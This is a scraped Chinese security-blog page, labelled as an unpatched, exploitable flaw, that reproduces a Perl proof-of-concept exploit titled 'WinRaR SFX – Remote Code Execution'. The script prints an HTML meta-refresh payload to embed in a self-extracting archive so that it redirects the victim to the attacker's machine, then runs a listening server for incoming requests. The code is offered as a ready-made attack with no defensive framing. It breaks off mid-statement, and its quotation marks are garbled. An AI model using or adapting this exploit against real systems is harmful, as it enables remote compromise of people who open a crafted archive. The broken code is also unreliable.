未修复可利用
PoC: Exploit Code #!/usr/bin/perl # Title : WinRaR SFX – Remote Code Execution # Tested on Windows 7 / Server 2008 / Server 2003 # # l0s4r.com use strict; use warnings; use IO::Socket; use MIME::Base64 qw( decode_base64 ); use Socket ‘inet_ntoa’; use Sys::Hostname ‘hostname’; print ” Mohammad Reza Espargham/n/n”; my $ip = inet_ntoa(scalar gethostbyname(hostname() || ‘localhost’)); my $port = 80; print “Winrar HTML Code/n”.'<html><head><title>poc</title><META http-equiv=”refresh” content=”0;URL=http://' . $ip . ‘”></head></html>’.”/n/n” if($port==80); print “Winrar HTML Code/n”.'<html><head><title>poc</title><META http-equiv=”refresh” content=”0;URL=http://' . $ip . ‘:’ . $port . ‘”></head></html>’.”/n/n” if($port!=80); my $server = new IO::Socket::INET( Proto => ‘tcp’, LocalPort => $port, Listen => SOMAXCONN, ReuseAddr => 1) or die “Unable to create server socket”; # Server loop while(my $client = $server->accept()) { my $client_info; while(<$client>) { last if /^/r/n$/; $client_info .= $_; } incoming($client, $client_info); } sub incoming { print “/n=== Incoming Request:/n”; my $client = shift; print $c
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论